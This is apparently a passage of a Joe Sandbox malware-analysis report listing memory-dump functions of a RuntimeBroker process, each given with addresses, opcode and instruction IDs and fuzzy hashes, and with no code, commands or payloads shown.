                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction ID: 7d77ad6cb2987bc77775083f8f66ba844faddb3fd44bbf9729ae6690ead2ed18
                                                                      • Opcode Fuzzy Hash: ba736035fa633c8ca825ff0cf86fb36d06e0121df7aab2ba7dc9bf295e1baaf4
                                                                      • Instruction Fuzzy Hash: EBE08C2164A7804FC30E66389CA98543BB1DFAB21278A41DBC041CB6B3EA2ECC89C741
                                                                      Function 00007FFD9B892AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: 9f57dabdae326f99f93587561800b524ac45c405cfcda306ebea8823e06024e6
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 35E01271F0D11A56FFA4A794D8617F966A0DB58300F1110B8D50ED33D1CD38AF418645
                                                                      Function 00007FFD9B8CA050 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8CA0E0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8B91A9 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction ID: 8b8c34f85137e0868dbb20e6eb0981472966af9f90bf3b0b39ec1eae5bb0345f
                                                                      • Opcode Fuzzy Hash: 3c89a02c4191a3142e1c0e985e323deac79fb3db9ccaa47c497b739200f758cd
                                                                      • Instruction Fuzzy Hash: 71E0127054F3C04FCB0AAB7488698543FB0AE6B21078F41EEC08ACF1B3E62D8949C701
                                                                      Function 00007FFD9B8C7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction ID: ebb476e041869fb9b3c971ffe5d6da40b05989d01fad73e43c37698f59567be2
                                                                      • Opcode Fuzzy Hash: 9eec8148cdc11d20ca6e4a29fc37742d57f5518ec323d69221f0075981819f0b
                                                                      • Instruction Fuzzy Hash: 76E01A6594E7C04FC70B9B3488B88547F60DE1721074A40EBC085CF2B3E5298949C711
                                                                      Function 00007FFD9B8CD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction ID: 0946180e54041b516ca7189a9017140664d13340f92fc9f56fb5c6a05218d10d
                                                                      • Opcode Fuzzy Hash: c12b24600996daff528c562a0a9ca3c030329e078465264730dea7850f23641e
                                                                      • Instruction Fuzzy Hash: A9E04F6194F7C04FC71BA73488788507FA0DE5721078A40EFC185CF5B3D5199849C712
                                                                      Function 00007FFD9B8CC7A9 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction ID: 012b1e8b9fceebd5ed2ad95eded0d7c9b0ee91a15502e2fb83c325f1afe833f3
                                                                      • Opcode Fuzzy Hash: c8262d4a635fcdd9bd911250cd8432f4b751a528c8bcc8fa1772dcca1dfffdf9
                                                                      • Instruction Fuzzy Hash: 2BE0173154A7C84FC30AAB749CB99543FB0EEAB21178B01D7D045CB6B3EA1E8D88C752
                                                                      Function 00007FFD9B8C8AF9 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction ID: 50a7127e8c417f4566172e8b9dbf396791b88f84637248cb58d4e2abd7bd6aad
                                                                      • Opcode Fuzzy Hash: 226fc8267aa11a770ddfa93aeebf5c346e660c4dea33991971a3f12b2e385b46
                                                                      • Instruction Fuzzy Hash: A6E0C23054A7C44FC30AA7648C788403FB1EE6B21178B40CBC005CF5B3EA0D8C48C742
                                                                      Function 00007FFD9B8C1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8CB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 43c17ab8deacb7067e5d0d38499529c0938a085f3d5cd66090e169f11640904d
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 56D01234B559044FC71CB739885987473A1EB6E21779640A9D00ACB2B1D96AED89C781
                                                                      Function 00007FFD9B8C6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: b1a987d9646deeebcc95fb385dab26c671575aa57d32c955645e03adb8f13550
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: 7DD02234B548040FC70CBB3888588303390EB6E2277C140A9D00AC72B1E92ADC88C740
                                                                      Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction ID: a1592d64f44aef6646087a3d6f4792349c7178ea0843b085b4c9772da485db98
                                                                      • Opcode Fuzzy Hash: 6893c421d8ec3c24c2459ab3e7736549536c1dc703aebdbdcaee714463a39ecf
                                                                      • Instruction Fuzzy Hash: 45C04C06F6B61F01FC3677EF98660ACA9405FDDE10FD70172D54D400E19D4D22D54156
                                                                      Function 00007FFD9B890B18 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction ID: 9e367327750c0d45ccf545ba014d1e26a92ed4a7658237128fca792b0164cc12
                                                                      • Opcode Fuzzy Hash: 2a8faffb6d7c173064e94cb45fe907dacfd8786a3a2eae6cb9d4298120f12918
                                                                      • Instruction Fuzzy Hash: 9FC08C305258088FC904E72DC98480076E0FB0D210BC20090E00EC7170E21A9C90C708
                                                                      Function 00007FFD9B891310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 45700d14890448792f7a77ee4ad80256f46f31d6e75c6f2da8f924a925832783
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F4C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7271E669DDD6C741
                                                                      Function 00007FFD9B8A685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction ID: e66853bd5abbd316dd62931102c6f23c031e02e0e75b1562851458f6f8d88ce2
                                                                      • Opcode Fuzzy Hash: 930dd795de9fa96c39b3a3dc93de49f779c1b9a10b594cbe09fb33c341a96781
                                                                      • Instruction Fuzzy Hash: 6BD0C930D045298FEBA0DB548890BA8B2B1AF48300F5400F6800CE3295CA356DC0DB50
                                                                      Function 00007FFD9B894E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 76bd946553c2ef4ebd4a948394b85e23847e7e7cada1b332635ab29511e26127
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 61C08CA1E2C20A95EB2496A048291AAB7818F09220F52867280ADA60A5DE2856025280
                                                                      Function 00007FFD9B892555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11219c9cdab58094410d6f84c7a7c82917cddf5ca3d9e1dbd0dc645d30ef2e81
                                                                      • Instruction ID: 5a8c65b56d8e49626075c2cd68e82ef15577381a2361e58e65664d2dddced39a
                                                                      • Opcode Fuzzy Hash: 11219c9cdab58094410d6f84c7a7c82917cddf5ca3d9e1dbd0dc645d30ef2e81
                                                                      • Instruction Fuzzy Hash: 11C08C00F0881E03F3593208043017E44C28B44344F8008B4E00EC3ACECD0C591203C7
                                                                      Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.2027371838.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: b3f92d2a2f5a77ba122d8cd4cd5a1a83409582608cc8b965e381d36b81ceda09
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 0FB01200E6740F00EC2433FB08520A478405B4C500FC20070D80E40091984D22940242

                                                                      Executed Functions

                                                                      Function 00007FFD9B8A09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 75294190a9d95d2372bf514a826eba52c34c101f09b19994c84c1195160ae2ed
                                                                      • Instruction ID: 6721cd6ecc786d8e59227f9a9162977fff59b9a6003761b7aa26d84455dce99d
                                                                      • Opcode Fuzzy Hash: 75294190a9d95d2372bf514a826eba52c34c101f09b19994c84c1195160ae2ed
                                                                      • Instruction Fuzzy Hash: 7FC2B331B1995E4FEBA8FB5884A1AB87792FFA8340F1541B9D01DC72D6DD38BD428780
                                                                      Function 00007FFD9B8C1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 287690af423bb94d1c621ef514f8e68e6269e721f9d50abac186c058724233af
                                                                      • Instruction ID: 44efd09074ccbe6ee6eb48f5bb3c1bb718e6ec44d624fad68e92ae6f6f028cc0
                                                                      • Opcode Fuzzy Hash: 287690af423bb94d1c621ef514f8e68e6269e721f9d50abac186c058724233af
                                                                      • Instruction Fuzzy Hash: FEB1DD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Function 00007FFD9B8BA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Function 00007FFD9B8C1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Function 00007FFD9B8B57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction ID: fe2cbfad1581625b9cfff53e52da6bcbe9b6fed1f23e7998a17270866b1435f5
                                                                      • Opcode Fuzzy Hash: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction Fuzzy Hash: 92E0923060A7C14FCB16AB748468455BFB0EF6720174A46EEC056CB1A3DB2DC886CB01
                                                                      Function 00007FFD9B8A3B19 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction ID: 135b3fa46d31af2e61232207c28bccebfda58029da2436e9f3cb6aeb8a92358b
                                                                      • Opcode Fuzzy Hash: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction Fuzzy Hash: 7CE0657160F7C44FC716A67488684547FA1EF6720174A41EFC086CF1A3DA1D8845C701
                                                                      Function 00007FFD9B8C1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Function 00007FFD9B8CA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Function 00007FFD9B8C2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Function 00007FFD9B8B9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Function 00007FFD9B8C3C69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.2151710885.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
